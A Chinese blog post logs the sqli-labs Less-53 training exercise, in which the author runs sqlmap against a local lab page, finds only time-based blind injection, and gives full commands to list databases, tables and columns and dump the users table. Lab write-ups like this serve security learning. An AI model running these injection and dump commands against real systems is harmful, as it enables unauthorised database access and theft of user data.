sqli-labs-Less-53

SQLI-LAPS 实验记录

Less-53

这一关与上一关类似,也是没有回显信息,采用sqlmap工具进行注入,发现只有时间盲注可以使用,因此,继续使用sqlmap工具来解决问题。

首先我们在命令行中输入sqlmap命令:

sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch

结果如图所示,只有一种注入方式:时间盲注。

接下来,我们继续使用sqlmap工具来进行注入,爆出数据库名、表名、列名等,语句如下:

  • 查询库名:
sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch --dbs
  • 查询表名:
sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security --tables
  • 查询列名:
sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --columns
  • 查询数据:
sql 复制代码
sqlmap -u http://localhost/sqli-labs/Less-53/?sort=1 --batch -D security -T users --dump
相关推荐
一嘴一个橘子8 分钟前
MySqL 的 B+树、 叶子节点、非叶子节点
mysql
麦聪聊数据13 分钟前
企业数据市场建设(三):API 化服务封装,让数据开箱即用、避免重复开发
数据库
麦聪聊数据25 分钟前
企业数据市场建设(四):流程闭环与价值运营,让数据市场真正转起来
运维·数据库
正儿八经的少年32 分钟前
redis 的大 key 和热 key 详解
数据库·redis·缓存
AI砖家36 分钟前
多智能体系统实战:架构设计、数据库表设计与 Skill 体系
数据库·多智能体·skill·agent架构设计·agengt
夜雪一千1 小时前
MySQL查询条件的顺序是否影响查询效率
数据库·mysql
X-⃢_⃢-X1 小时前
十、Redis之布隆过滤器
数据库·redis·缓存
Nturmoils1 小时前
订单号查出了三笔,我以为是数据脏了,其实是自己写错了
数据库
ZKNOW甄知科技1 小时前
燕千云深度集成飞书:以AI之力,开启无感IT运维体验
大数据·运维·网络·数据库·人工智能·低代码·集成学习
WWJA王文举1 小时前
单片机参数如何掉电保存:Flash、EEPROM和配置存储完整设计
数据库·stm32·mongodb·c#